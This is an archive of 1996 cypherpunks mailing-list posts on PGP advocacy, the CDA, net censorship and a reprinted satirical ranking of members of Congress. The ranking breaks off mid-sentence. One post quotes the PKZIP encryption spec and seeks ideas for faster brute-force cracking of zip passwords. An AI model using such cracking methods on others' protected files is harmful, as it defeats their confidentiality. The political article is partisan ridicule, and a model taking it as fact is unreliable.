Zi24IqjbCD2wYnovPOAZVmppOCoD0Au6XdUPdY2rLN/AEqo7H4H3RefTXDozu1J6
9QTOytuwLhaSlQ6BeBi2XhTrKFM7g1EtpA8O+B2tEOqvghQgq9f5SeY2kOY+5792
RY4EKlhcGIeT95pevnoQFPWTQA5wJghpXD1D4gfg7hULDZM1ZXLZRHF+XxlQImgZ
SrxISrE1kDxlwHe4BYM4WXPH3OU0Gj4H9pH2J0YZA5H5pZS90u7mwA==
=aNzy
-----END PGP SIGNATURE-----
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 11 Feb 1996 10:35:15 +0800
To: cypherpunks@toad.com
Subject: Re: Privacy Without Tears
Message-ID: <2.2.32.19960211020543.006a107c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Excellent.  This is much-needed.  Please see
>"http://www.c2.org/~bryce/WhatIsPGP.html", and consider
>cross-linking with me.

Will do - URL squirreled away for when I do the References pages.

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 10 Feb 1996 18:10:29 +0800
To: cypherpunks@toad.com
Subject: new zip cracking code
Message-ID: <199602100709.SAA03239@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Does anyone have any pointers to cryptanalysis papers on the Zip
encryption scheme (presented below)? I've seen a few MSDOS executeables
which used some sort of brute force attack, which didn't seem
particularly intelligent or effective for long passwords. If anyone has
some pointers, or source I'd be glad to hear of it. From what I can see
of Schlafly's algorithm a bute force attack could be speed up a great
deal by pre-compution and expansaion of elements of the first 3 or so
rounds at the very least.

Ideas anyone?


Decryption
----------

The encryption used in PKZIP was generously supplied by Roger
Schlafly.  PKWARE is grateful to Mr. Schlafly for his expert
help and advice in the field of data encryption.

PKZIP encrypts the compressed data stream.  Encrypted files must
be decrypted before they can be extracted.

Each encrypted file has an extra 12 bytes stored at the start of
the data area defining the encryption header for that file.  The
encryption header is originally set to random values, and then
itself encrypted, using 3, 32-bit keys.  The key values are 
initialized using the supplied encryption password.  After each byte
is encrypted, the keys are then updated using psuedo-random number
generation techniques in combination with the same CRC-32 algorithm 
used in PKZIP and described elsewhere in this document.

The following is the basic steps required to decrypt a file:

1) Initialize the three 32-bit keys with the password.
2) Read and decrypt the 12-byte encryption header, further
   initializing the encryption keys.
3) Read and decrypt the compressed data stream using the
   encryption keys.


Step 1 - Initializing the encryption keys
-----------------------------------------

Key(0) <- 305419896
Key(1) <- 591751049
Key(2) <- 878082192

loop for i <- 0 to length(password)-1
    update_keys(password(i))
end loop


Where update_keys() is defined as:


update_keys(char):
  Key(0) <- crc32(key(0),char)
  Key(1) <- Key(1) + (Key(0) & 000000ffH)
  Key(1) <- Key(1) * 134775813 + 1
  Key(2) <- crc32(key(2),key(1) >> 24)
end update_keys


Where crc32(old_crc,char) is a routine that given a CRC value and a 
character, returns an updated CRC value after applying the CRC-32 
algorithm described elsewhere in this document.


Step 2 - Decrypting the encryption header
-----------------------------------------

The purpose of this step is to further initialize the encryption
keys, based on random data, to render a plaintext attack on the
data ineffective.


Read the 12-byte encryption header into Buffer, in locations
Buffer(0) thru Buffer(11).

loop for i <- 0 to 11
    C <- buffer(i) ^ decrypt_byte()
    update_keys(C)
    buffer(i) <- C
end loop


Where decrypt_byte() is defined as:


unsigned char decrypt_byte()
    local unsigned short temp
    temp <- Key(2) | 2
    decrypt_byte <- (temp * (temp ^ 1)) >> 8
end decrypt_byte


After the header is decrypted, the last two bytes in Buffer
should be the high-order word of the CRC for the file being
decrypted, stored in Intel low-byte/high-byte order.  This can
be used to test if the password supplied is correct or not.


Step 3 - Decrypting the compressed data stream
----------------------------------------------

The compressed data stream can be decrypted as follows:


loop until done
    read a charcter into C
    Temp <- C ^ decrypt_byte()
    update_keys(temp)
    output Temp
end loop



-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 11 Feb 1996 08:05:35 +0800
To: vince@offshore.com.ai>
Subject: [NOISY] Re: New Internet Privacy Provider - Press Release
In-Reply-To: <Pine.LNX.3.91.960209084435.1000A-100000@online.offshore.com.ai>
Message-ID: <0l7GNu200bk=4YzNJr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Feb-96 New Internet Privacy
Provid.. by Vincent Cate@offshore.co 
> PRESS RELEASE:  2/9/96  Anguilla, Offshore Information Services Ltd.
>  
> As a result of recent efforts to censor the Internet in France, Germany,
> China, and now the USA, Offshore Information Services Ltd. (OIS)
> anticipates a larger market for privacy services over the Internet. OIS is
> well suited to provide such service since it is located in Anguilla, a
> taxhaven in the Caribbean with strict secrecy laws.  OIS is now entering
> this market. 

Thanks, but no thanks. I don't need a shell account at $1,200 a year.

-Declan

PS: Spelling "identity" incorrectly in your press release posted here
and on your web site makes you look pretty silly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 11 Feb 1996 11:20:39 +0800
To: cypherpunks@toad.com
Subject: Re: Privacy Without Tears
Message-ID: <2.2.32.19960211021734.006b0ec0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:53 PM 2/10/96 -0800, Lunaslide wrote:

>If everyone not only has a link to these pages in text, but also has their
>"PGP secured!", or similar little graphic on their pages, linked to these
>sites as well, it would save a lot of people a lot of redundant explaining
>and it would help spread the word about PGP like wildfire to the masses.

I like that a lot! A nifty graphic would be the old-fashioned engraving of a
padlock on the O'Reilly book about PGP.

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 11 Feb 1996 08:04:05 +0800
To: cypherpunks@toad.com
Subject: Re: A Rant about Senator James Exon
In-Reply-To: <ad4147eb37021004e8ee@[205.199.118.202]>
Message-ID: <8l7GaN600bk=8YzEFQ@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Feb-96 A Rant about Senator James
.. by Timothy C. May@got.net 
> >What do you think? Is this worth it?
>  
> Here's something I did about Senator James Exon:

In my protest against the Hon. Jim Exon, I went to his office this week
and dropped off a printout of indecent speech that I have on the Justice
on Campus Project:

   http://joc.mit.edu/lawsuit/examples.html

I told the bewildered receptionist that his boss was to blame for making
me a criminal.

I'm now a plaintiff in the ACLU/EFF lawsuit challenging the CDA, BTW.
Two articles on our lawsuit are at:

   http://fight-censorship.dementia.org/fight-censorship/dl?num=1063
   http://fight-censorship.dementia.org/fight-censorship/dl?num=1067

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 11 Feb 1996 09:21:05 +0800
To: cypherpunks@toad.com
Subject: Deafening silence [was Re: Need a "warning" graphic...]
Message-ID: <199602110017.TAA48888@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Sten Drescher wrote:

<snips>

>"Lynne L. Harrison" <lharrison@mhv.net> said:
>
>LLH> IMO, the topics he
>LLH> discussed in his State of the Union address gave a clear message
>LLH> that he was going to sign this bill.
>
>	He signed the military spending bill, too.  And, unfortunately
>(because of the bigotry it reflects), being painted as protecting gays
>isn't going to be much better than being painted as protecting
>pornography.  My point is that Clinton _doesn't_ have the same "this
>provision is unconstitutional" feeling about the CDA as he does about
>the AIDS provision.

Further, has anyone else noticed a deafening silence on the subject of
a (supposedly) wished-for line-item veto power of presidents? It seems
to me that the Dornan and CDA-type provisions of huge bills are line-
items, aren't they?
JMR

Regards, Jim Ray <liberty@gate.net> Boycott espionage-enabled software!

"Americans hate the IRS, and if the only way they can get rid of it
 is to elect somebody who is communicating directly with the Planet
 Xorgon, then so be it." -- Dave Barry [on Steve Forbes] 2/9/96.
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  http://www.shopmiami.com/prs/jimray IANAL
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMR0yS21lp8bpvW01AQE23QP+OZJKOIBGQsRMTiD0cyy+8wreirn9TqAN
0m3RFIuP0P/2LHm9lLxMib23DyEWAGws4C5VfNLAZvPvsZz/WaOv/2+g0RdOwK0Y
LFplxhIHpFRVkDZhKTSqTKnbT3tK9OLDTKETfhnoq6KC1OJ2AuS33Xfd+Lay7FGT
lYuqjesg8BI=
=EHLF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@doe.ernet.in>
Date: Sat, 10 Feb 1996 22:19:20 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: China
In-Reply-To: <199602081727.LAA01429@proust.suba.com>
Message-ID: <Pine.3.89.9602101826.D2343-0100000@mahavir>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Feb 1996, Alex Strasheim wrote:

> I've seen a couple of pointers to information about China's ambitious
> attempt to build their own censorable net, but not a lot of discussion. 

Agreed, and not just about China. The Internet community is supposedly 
international, yet can be remarkably parochial. 

> The Chineese net strikes me as a very signifiant (and very negative)
> development.  

I'm sure it surprises nobody that the perpetrators of Tiananmen will 
not let the Internet slip through, without an attempt at censorship. 
However, on this subject, I stand by the conclusion of my "Radio Free 
Usenet" July 95 Byte commentary, that if ever they attempt a Tiananmen 
Square in cyberspace, the students will deploy the more powerful tanks. 
Running an ISP isn't easy, and if you are an authoritarian, it is even 
harder. Once they set up the infrastructure, the genie will be out of the 
bottle. Remember that starting this year, satellites of Iridium and other 
LEO satellite projects will start to go up, spreading bandwidth around 
the world. How will the Chinese government build a firewall against 
satellites? Say, for instance orbiting anonymous remailers with pgp? Will 
happen some day.

However, that is not a reason for complacency. I think your warning is 
timely, and discussion, perhaps even action, may be called for. If people 
can mirror a web site so that Germans get access to it (an action I 
entirely support) what is being done about the large numbers of 
newsgroups that India and China have no access to? 

A lot of noise is made about how Compuserve users do not have access to
the sexusenet. Guess what -- in India, now China, we've *never* had such
access. Why is that any more acceptable? 

Arun Mehta, B-69 Lajpat Nagar-I, New Delhi-24, India. Phone 6841172,6849103
amehta@doe.ernet.in a.mehta@axcess.net.in amehta@cerf.net
http://mahavir.doe.ernet.in/~pinaward/arun.htm
"I do not want my house to be walled in on all sides and my windows to be 
stuffed. I want the cultures of all the lands to be blown about my house 
as freely as possible. But I refuse to be blown off my feet by any."--Gandhi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sun, 11 Feb 1996 12:10:21 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Privacy Without Tears
Message-ID: <v01530507ad4311fd9c58@[204.179.169.65]>
MIME-Version: 1.0
Content-Type: text/plain


>At 05:53 PM 2/10/96 -0800, Lunaslide wrote:
>
>>If everyone not only has a link to these pages in text, but also has their
>>"PGP secured!", or similar little graphic on their pages, linked to these
>>sites as well, it would save a lot of people a lot of redundant explaining
>>and it would help spread the word about PGP like wildfire to the masses.
>
>I like that a lot! A nifty graphic would be the old-fashioned engraving of a
>padlock on the O'Reilly book about PGP.

There have also been graphics handily prepared by a member of this list.
Regretfully, I forget the URL and who it was from.  Anybody got that for us
again please?

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

Digitally sign your mail too!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 11 Feb 1996 09:24:16 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Chinese/Indian censorship of alt.sex.* etc. (Was: China)
In-Reply-To: <Pine.3.89.9602101826.D2343-0100000@mahavir>
Message-ID: <199602110103.UAA05043@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta writes:
> A lot of noise is made about how Compuserve users do not have access to
> the sexusenet. Guess what -- in India, now China, we've *never* had such
> access. Why is that any more acceptable? 

I have always assumed that people on the net in India, China, etc. can use
the same free net.resources as everyone else to access locally blocked
material. For newsgroups, use something like 
	http://dana.ucc.nau.edu/~jwa/open-sites.html 

If the Indian or Chinese govt. forces all ISPs in its country to block
all known open NNTP servers, then that's a more serious situation. But I
haven't read anything indicating that.

The CompuServe incident caused a big ruckus because it involved a conflict
between the German govt. and many U.S. users, and (like it or not) users 
in the U.S. seem to be the most vocal group on the net.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Feb 1996 15:24:50 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tlT1P-0008zzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 PM 2/9/96 EDT, E. ALLEN SMITH wrote:
>	Whoops. I didn't mean to send that one to the list (re: ethics of
>assasination). Sorry. I am still trying to decide on whether other discussions
>of the non-Crypto aspects of Assasination Politics are appropriate; I would
>appreciate mail back from Perry in response to my email to him.
>	Sorry again,
>	-Allen

If Perry is REALLY sincere about objecting to the NON-crypto part of AsPol,
he should demonstrate this by writing notes which are focussing on the
crypto aspects, rather than just complaining.

Jim Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 11 Feb 1996 13:13:34 +0800
To: Joe Zychik <jzychik@via.net>
Subject: Re: Req. for soundbites
In-Reply-To: <2.2.32.19960210050116.006a6880@via.net>
Message-ID: <v03004b26ad43041869c7@[129.46.82.84]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 PM 2/9/96, Joe Zychik wrote:
[elided]
>A local TV station has asked me for an interview, after I sent a graphic
>of a mono-digital hand gesture with the phrase "censor this!" to the Prez,
>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio
>station), accompanied by a 'confession' and demand for swift prosecution.
>
>Anyone got any nifty sound bites I can try to toss in?

I don't have soundbites per se, but since Senator #3 (Larry Pressler)
described in the Bottom Ten Congresspeople post below is a leading CDA
Goose, this might be worth a gander...

   dave

................................. cut here .................................

The Ten Most Dimwitted Members of Congress

BY  KEN SILVERSTEIN  (As published in The Progressive)

H.L. Mencken once wrote that since elections produced such dreadful
results, citizens should stop wasting their time voting and simply pick
their representatives at random from the phone book.  Mencken's barb has
even more sting these days since the quality of political leadership seems
to have dropped precipitously, as a few random hours watching C-Span
quickly reveals.

     Identifying the ten most dimwitted members of Congress was a
difficult task.  To do so, I canvassed several dozen sources-- liberal
and conservative, Democrat and Republican-- on Capitol Hill. Seven
freshmen and one sophomore won a place on the list. Thanks to the sheer
brute stupidity of these newcomers, world-class contenders like New York
Senator Alfonse D'Amato and California Representative Bob Dornan didn't
even come close to making the final cut.

     Before turning to the roll call, a few caveats.

     First, I intended to create a bipartisan list, but was unable to come
up with any suitable Democratic candidates. This in no way reflects the
high intellectual caliber of the party, which has its fair share of
nitwits.  However, I found that while Democrats were eager to point to
Republicans, the opposite was not the case: Republicans fingered their
own.  "That's the luxury you have when you're in the majority," one
Democratic staffer complained bitterly.

     Second, while most of the members here come from the GOP's right wing,
it would be a mistake to conclude, as many liberals do, that conservatives
are generally dumb: Newt Gingrich and Jesse Helms are anything but stupid.

     Finally, while the distinguished members of the list may enrich the
nation's political folklore, their foolishness is dangerous.

     That said, the winners are:


No. 10 - Representative Martin Hoke - Ohio (first elected in 1992)

     Hoke, a millionaire businessman, was a political unknown when he
defeated Representative Mary Rose Oakar in 1992.  He's accomplished
little in Washington and would likely still be unknown if it weren't for
his frequent blunders.

     After President Clinton's 1994 State of the Union address, Hoke and a
Democratic colleague, Eric Fingerhut, were asked for comment by a local
network affiliate.  The pair was wired up by producer Lisa Dwyer.  As she
walked away, Hoke-- unaware that his observations were being recorded by an
open microphone-- exclaimed in a mock accent, "She has the beeeeeg breasts."
The day after this slip, Hoke expressed a certain relief when an escaped
Ohio convict went on a murder spree, suggesting to a reporter that the
killings might knock his remark about Dwyer off the front pages of local
newspapers.

     This was not Hoke's only slip in the area of gender politics.
Interviewed by The New York Times's Maureen Dowd about the life of the
single man on Capitol Hill, Hoke, a divorcee, replied, "I could date Maria
Cantwell or Blanche Lambert- they're hot."  Cantwell and Lambert, fellow
members of Congress, were not amused.

     Hoke fervently attacks "big government," but sometimes seems unfamiliar
with his target.  In 1992, he was demanding urgent reform at the Federal
Savings and Loan Insurance Corporation, an agency abolished three years
earlier.

     When Hoke defeated Oakar he had the band at his victory party play,
"Ding Dong, the Witch Is Dead."  Commenting on Hoke's D.C. exploits, Oakar
has suggested that the Congressman should change the tune to another song
from The Wizard of Oz: "If I Only Had a Brain."


No. 9 - Representative Don Young - Alaska (1973)

     The new head of the House Resources Committee, Young is best known for
his rabid attacks on ecologists.  Animal-rights advocate Mary Tyler Moore
once read a poem about the cruelty of steel-jaw leg-hold traps before the
Merchant Marine subcommittee, where Young previously served.  Accompanying
Moore was Cleveland Amory, who periodically inserted a pencil in a trap,
causing it to snap shut.

     The moment was highly charged and Young, as a hunter and trapper,
realized dramatic action was required to turn the tide.  His solution
was to place his hand into a trap he had brought along to the hearing, and
then begin to calmly question a witness as though nothing unusual had
happened.  "I never told a anyone, but it hurt like hell," Young later
confided to a Congressional staffer.

     Young also made use of a visual aid at a 1994 hearing.  Young waved an
18-inch oosik-- the penis bone of the walrus-- at Mollie Beattie, director
of the U.S. Fish and Wildlife Service.  Beattie had suggested that Alaskan
Natives should be able to sell oosiks only as handicrafts, not uncarved, a
proposal Young derided.  The incident was especially embarrassing because
Beattie is the first woman to head the Service, and the hearing marked her
debut on the Hill.

     Earlier this year, a group of students in Fairbanks invited the Alaskan
wild man to speak about the GOP's "Contract with America."  Young expounded
on a number of his favorite topics, including the need to slash federal
funding of the arts.  The government, Young said, has funded "photographs
of people doing offensive things" and "things that are absolutely
ridiculous."  One student asked Young what sort of things he had in mind.
"Buttfucking," the Congressman replied (a reference to a 1990 exhibit of
Robert Mapplethorpe photographs in Cincinnati supported by the National
Endowment for the Arts).  Young defended his remarks, saying he was merely
"trying to educate" the inquisitive youngsters.


No. 8 - Representative Sonny Bono - California (1994)

     Sonny Bono, the new Representative of California's forty-fourth
district, is best known in his post-Cher incarnation for his four guest
appearances on Love Boat.  He didn't enter politics because of any keen
desire to better the world.  He was simply mad about how long it took to
get a permit to open a restaurant in Palm Springs.

     Bono's mental shortcomings have long made him a subject of scorn among
California politicians.  During his run for Congress last year, Palm Desert
councilman Walt Snyder called Bono a "laughingstock," and Representative Al
McCandless charged that he took "pride in not having studied [the] issues
until just a few months ago."  Snyder and McCandless, incidentally, are both
Republicans, and they both supported Bono in his race against Democrat Steve
Clute.

     Bono served as mayor of Palm Springs between 1988 and 1992.  His
public-relations director, Marilyn Baker, later revealed to the Los Angeles
Times that she had to rewrite the mayor's agendas into script form so Bono
could conduct official business. "For call to order, I wrote,  'Sit.'  For
salute the flag, I wrote, 'Stand up, face flag, mouth words.'  For roll
call, I wrote, 'When you hear your name, say yes,"' recalled Baker, who quit
after three depressing months of service.

     Bono's current legislative director, Curt Hollman, is charged with the
Herculean task of summarizing complex issues in short, simple memos that
Bono can comprehend.  Unfortunately, Hollman can't watch during all of his
assignments.  At one Judiciary Committee hearing, Bono complained, "Boy,
it's been flying in this room like I can't believe today.  We have a very
simple and concise bill here, and I think it would be to everyone's pleasure
if we would just pass this thing."  This prompted New York's Charles E.
Schumer to dryly reply, "We're making laws here, not sausages."

     On another occasion, Bono complained that his colleagues were becoming
needlessly bogged down in "technical" matters and legalese.  This about the
Judiciary Committee, which writes laws and deals with trifling matters such
as constitutional protections.


No. 7 - Representative Jack Metcalf - Washington (1994)

     Metcalf describes himself as "a guy willing to take some kamikaze
runs," a statement reflected in some of his policy stances.  He has
advocated, for example, a return to the gold standard and the abolition of
paper money.  Even The Wall Street Journal once mocked Metcalf for keeping
company with "gold bugs, tax protesters, and conspiracy theorists," and
noted with concern that he had secretly buried in the woods thousands of
dollars in silver coins in expectation that "a cataclysm of some sort [will]
engulf the nation."

     Metcalf frequently adopts positions that don't square with his actions.
He is an ardent champion of term limits, yet he has served for twenty-four
years in the Washington state legislature.  During the 1994 campaign, he
pounded his Democratic opponent, Harriet Spanel, with charges that she
opposed the death penalty and was generally indulgent of the criminal
element.  Then, during the final days of the race, the Metcalf camp covertly
contracted prisoners at the Washington State Reformatory to conduct its
telemarketing operation.

     The sixty-seven-year-old Metcalf is an old-fashioned sort, as seen in
his views on curbing teen pregnancies.  As he told interviewers from
Republican Beat-- a fictitious youth magazine dreamed up by Spy-- people
under sixteen "need to be closely chaperoned by their parents.  They won't
like that, but what causes teenage pregnancies all over that we're worried
about is unchaperoned kids. Period."

     Despite his lack of brain power, the courtly Metcalf is popular in
Congress, where he is seen as a well-meaning simpleton.  "Jack wants to do
the right thing," says one House staffer.  "He just doesn't have a clue as
to what the right thing is."


No. 6 - Representative J.D. Hayworth - Arizona (1994)

     A former TV sportscaster and football player, Hayworth, like Gerald
Ford, appears to have forgotten his helmet one too many times.  At a
recent convention of People for the West!, a group linked to the Wise Use
movement, Hayworth said that logging was a particularly beneficial activity
because forests are a fire hazard.

     Hayworth's entire political philosophy can be boiled down to "Big
government, bad; less government, good."  The Arizona Republic has said that
"substance has never been a strong suit of Hayworth's (even by sportscasting
standards)," and that he even has "to read his cliches from a script."

     Hayworth's major activity since coming to Washington-- and one that
invariably sets off waves of anguished head-slapping on the floor-- is his
daily one-minute statement.  His attempts at humor elicit groans, as when
he suggested to the opposition party that it "lure Freddy Krueger as the
new liberal Democrat spokesman" and "set up a new political-action
committee, the 'Whine Producers.' "

     Though decidedly dumb, Hayworth is also smooth and relentless.  "You
can't have a real debate with Hayworth," says one Democratic staffer.  "He
talks as passionately about his need to take a No. 1 as he does about the
need to cut government spending."


No. 5 - Representative John Hostettler - Indiana (1994)

     Hostettler's dumb roots run deep.  He's an enthusiast of Dan "Potatoe"
Quayle, who campaigned on Hostettler's behalf.  And he has Quayle's penchant
for putting his foot in his mouth.

     In opposing gun control to a group of high-school students, he
suggested that the Second Amendment allowed for the private ownership of
nuclear weapons as well as handguns.  He alienated Jewish voters when, at
a candidates' forum he made reference to the people "who killed Jesus
Christ."

     Hostettler sometimes cites historical precedent in pushing the Contract
with America, though his grasp of the subject is shaky at best.  He blithely
supported slashing government spending, including deep cuts in social
programs, saying in a speech on the House floor on March 16 that "American
society can and will take better care of its needy without the interference
of the federal government."  To back this assertion, he referred to the
progressive era, when "local charitable agencies" looked after the poor.

     (Never mind progressive-era books, like Lincoln Steffens's The Shame
of the Cities and Upton Sinclair's The Jungle, that detailed the urban
misery that private charities failed to dent.)  "The signature notion of
the progressive era was the demand for government regulation to ameliorate
society's injustices," says Josh Brown, a historian and media director of
Hunter College's American Society History Project, "Hostettler's got his
history all wrong."


No. 4 - Representative Frank Cremeans - Ohio (1994)

     "The Greeks and the Romans were homosexuals.  Their civilizations did
not stand.  Did they come in contact with a social disease like AIDS? I
don't know the answer.  But I wonder."  This was Frank Cremeans pondering
the enigmas of history during the 1994 campaign against Democrat Ted
Strickland.  Comments like this prompted the Dayton Daily News to call
Cremeans "a bad joke" whose election would constitute "a mockery of
democracy."

     Cremeans has continued to make bizarre statements since taking up
residence in the Capitol.  He once declared his opposition to sex before
marriage, saying that "marriage is a very sanctimonious commitment."  In an
interview with a radio station in Marietta, Ohio, during which he discussed
Congress's first 100 days under Newt Gingrich, Cremeans excitedly declared
to the show's host, "Just think about it, Mike, we're advancing backwards!"

     Cremeans might have ranked lower here but, unlike some of his
competitors, he is smart enough to know he's dumb.  He wisely refuses
to answer any substantive questions from the press or public, referring all
such inquiries to his chief of staff, Barry Bennett, a prominent Ohio
Republican who is viewed in Washington as Cremeans's babysitter-- "His
handlers can tell him anything and he'll simply repeat it over and over,"
says one committee staffer familiar with Cremeans.  "He takes direction well
but when he tries to think on his feet he quickly gets into trouble."


No. 3 - Senator Larry Pressler - South Dakota (1978)

	Most recently noted for his attacks on public broadcasting,
Pressler, the only Senator to make the list, is considered to be a
hopeless nitwit by virtually all of his colleagues.  Ted Kennedy once asked
a former Senatorial colleague of Pressler, "Has he had a lobotomy?"  South
Dakota's other senator, Thomas Daschle, said of Pressler, "A Senate seat is
a terrible thing to waste."

     Pressler has had repeated difficulties with closets.  On one occasion
he fell asleep in one and arrived late to an important hearing.  In
another incident he rose from a meeting with colleagues in the Commerce
Committee and mistook a closet door for the exit.  He realized his mistake
but apparently thought the best strategy would be to wait to emerge until
everyone else left the room, a tactic that failed when his companions
decided to wait him out.

     Pressler has sponsored virtually no important legislation during his
two decades in Washington, a fact he seeks to obscure by issuing
frequent press releases touting his meager achievements.  One example: "New
York Times Carries Pressler Drought Letter."

     Parliamentary procedure has never been one of Pressler's strong points.
During the recent mark-up of the Omnibus Telecommunications Bill, lobbyists
assisting the proceedings on TV from a Commerce Committee anteroom roared
with laughter as Chairman Pressler mangled the hearings.  To keep him from
participating in committee affairs, Republican staffers distract Pressler
with a constant stream of unimportant memos.


No. 2 - Representative Helen Chenoweth - Idaho (1994)

     Chenoweth-- an ultraconservative who prefers to be called Congressman--
is a close political and philosophical ally of the loonier sectors of the
militia movement.  Earlier this year she claimed that federal agents
enforcing the Endangered Species Act were landing black helicopters on
ranchers' properties in western states.

     On the campaign trail last year, Chenoweth held fundraisers where she
sold baked Sockeye Salmon, an endangered species.  Asked if she believed
the Sockeye were truly threatened, she said, "How can I, when you can go in
and you can buy a can of salmon off the shelf in Albertson's?"  According
to Chenoweth, "It's the white Anglo-Saxon male that's endangered today."

     To one group of scientists who testified before the resources
committee, Chenoweth said, "I want to thank you for all being here and
I condemn the panel."  At a field hearing on the Endangered Species Act in
New Bern, North Carolina, she apologized to a witness, saying, "I didn't
understand everything you said.  You all talk so funny down here."  On the
House floor, she once protested, "Excuse me, but can someone please explain
what an ecosystem is?"

     Chenoweth blindly attacks any proposal emanating from the White House.
She once arrived badly late to an energy subcommittee hearing, and quickly
began attacking Administration officials who were testifying about a
proposed bill that she opposed.  The acting chair, John Doolittle of
California, finally cut Chenoweth off to inform her that the officials
shared her position.


No. 1 - Representative Jon Christensen - Nebraska (1994)

     Unquestionably the dumbest man to serve in the 104th Congress,
Christensen rails against the "liberal elite," whom he claims is out of
touch with the daily struggles of common folk.  Christensen himself has no
achievements to speak of, and, prior to his election, lived off the interest
income of his wife, Meredith, who springs from a rich Texas clan.

     After graduating from law school, Christensen twice failed the Nebraska
bar exam, finally squeaking through on his third attempt.  No law firm would
hire him (except for clerking duties), so Christensen was forced to sell
insurance.  He supplemented his income by peddling lawn fertilizer out of
his garage.  In a brazen display of resume inflation, Christensen now
describes his past positions as "Insurance Marketing Director" and
"Fertilizer Holding Company Executive."

     During the 1994 campaign, Christensen held a question-and-answer
session at Omaha's Westside High School.  Apparently fearful that their man
would wither under pressure, Christensen's aides prepared questions in
advance and handed them out to students who were volunteers for his
campaign, telling them to clutch their pens in their  hand so the candidate
would know who to call on.  Other students learned of the fix, and foiled
Christensen's plot by holding pens in their hands when asking questions.
"If he can't stand up to a roomful of seventeen-year-olds, how is he going
to stand up to the U.S. Congress?" Westside senior Joey Hornstein asked the
local press.

     During a radio interview in Nebraska, Christensen vigorously attacked
